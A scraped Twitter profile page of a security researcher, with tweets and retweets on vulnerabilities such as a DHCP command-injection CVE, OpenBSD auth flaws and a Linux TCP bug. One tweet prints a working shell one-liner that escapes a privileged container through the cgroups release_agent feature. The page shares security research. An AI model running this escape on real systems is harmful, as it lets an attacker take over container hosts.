Felix Wilhelm

@_fel1x

Zürich, Switzerland
Vrijeme pridruživanja: studeni 2010.

Tweetovi

Blokirali ste korisnika/cu @_fel1x

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @_fel1x

  1. Prikvačeni tweet
    15. svi 2018.

    CVE 2018-1111 is a pretty bad DHCP remote root command injection affecting Red Hat derivates: . Exploit fits in a tweet so you should patch as soon as possible.

    Prikaži ovu nit
    Poništi
  2. 3. velj

    Super excited about joining the team :)

    Poništi
  3. proslijedio/la je Tweet
    30. sij
    Poništi
  4. proslijedio/la je Tweet
    23. sij
    Odgovor korisnicima

    Just looking at this UAF in net ingress path: Which fixes "tcp: Fix highest_sack and highest_sack_seq" which fixes "tcp: highest_sack fix" which fixes "tcp: use sequence distance to detect reordering"... One of them took 2+ years to discover...

    Poništi
  5. proslijedio/la je Tweet
    4. pro 2019.

    Qualys Security Advisory: Authentication vulnerabilities in OpenBSD's auth system (CVE-2019-19521). LPE on default install via xlock (CVE-2019-19520) and su (CVE-2019-19519). Local root if S/Key or yubikey is enabled (CVE-2019-19522). More details at

    Poništi
  6. 28. stu 2019.

    I'll be in London next week for Blackhat Europe. Hit me up if you’d like to meet there.

    Poništi
  7. proslijedio/la je Tweet
    24. lis 2019.

    We’ve just published a new article about typical security issues in JSON Web Tokens (JWT). Learn about the eleven thorns right here:

    Poništi
  8. proslijedio/la je Tweet
    16. lis 2019.
    Odgovor korisniku/ci

    *sigh* bro please

    Poništi
  9. proslijedio/la je Tweet
    3. lis 2019.

    Uh-oh, I see security bugs coming. Found by and his . Certain data structures in Java Apache Commons: Insert "x". Insert "x\u0000". Now "x" is not in there anymore. also, a for my talk at

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    Odgovor korisniku/ci

    Haha, I googled the strings in the output, it seems like he's using a hacked up , e.g. "Info:root: Set tasks.threads=8 based on detected logical cpus" -

    Poništi
  11. proslijedio/la je Tweet
    31. kol 2019.

    Having spent most of this week editing 184-page “blogbook”, I’d like to highlight three things so they don’t get missed: 1. 's JSC exploit piece () on patch gapping and n-day bugs being used as an easy way to score 0-day like capabilities

    Prikaži ovu nit
    Poništi
  12. 10. kol 2019.
    Poništi
  13. proslijedio/la je Tweet
    8. kol 2019.

    So... we'll give out 100k USD in Grants for Google Cloud vulnerability research and we'll pay the best report we get in 2019 another 100k

    Poništi
  14. proslijedio/la je Tweet
    6. kol 2019.

    🔎 Check out "Open Sourcing the Security Audit" from on the blog today! ➡️Chris shares the audit process and results 🌟

    Poništi
  15. proslijedio/la je Tweet
    25. srp 2019.
    Poništi
  16. proslijedio/la je Tweet
    22. srp 2019.

    Forgot to mention this, but grsec has prevented this attack and ones like it since 2013 (they're all based off call_usermodehelper and it being modifiable in a container but interpreted on the host fs)

    Poništi
  17. proslijedio/la je Tweet

    Earlier this year I FOIAed the FBI for details on allegations of backdoor installed in the IPSEC stack in 2010, originally discussed by OpenBSD devs () Today, I got an interesting but unexpected responsive record:

    Prikaži ovu nit
    Poništi
  18. proslijedio/la je Tweet
    18. srp 2019.

    . and I just spent some time on this. Let's explain what we think we figured out. First up, cgroup release notifications allow a program (the release agent) to be run when the cgroup becomes empty. Source

    Prikaži ovu nit
    Poništi
  19. 17. srp 2019.

    Quick and dirty way to get out of a privileged k8s pod or docker container by using cgroups release_agent feature.

    Prikaži ovu nit
    Poništi
  20. 17. srp 2019.

    d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p /w;echo 1 >$d/w/notify_on_release t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` touch /o; echo /c >$d/release_agent;echo "#!/bin/sh $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o

    Prikaži ovu nit
    Poništi
  21. proslijedio/la je Tweet
    24. lip 2019.

    Something for everyone...

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·